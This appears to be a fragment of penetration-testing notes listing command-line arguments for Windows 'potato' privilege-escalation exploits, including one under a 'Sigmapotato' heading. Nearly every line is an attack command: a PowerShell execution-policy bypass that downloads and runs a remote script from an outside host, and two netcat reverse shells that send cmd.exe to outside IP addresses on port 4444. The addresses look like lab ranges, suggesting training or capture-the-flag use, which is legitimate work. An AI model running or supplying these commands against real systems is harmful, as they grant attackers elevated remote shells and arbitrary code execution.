`-l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')"`
`-p c:\windows\system32\cmd.exe -a "/c c:\users\adrian\downloads\nc.exe -e cmd.exe 192.168.45.206 4444" -t *`


## Sigmapotato

c:\users\a.hansen\desktop\nc.exe -e cmd.exe 192.168.49.91 4444"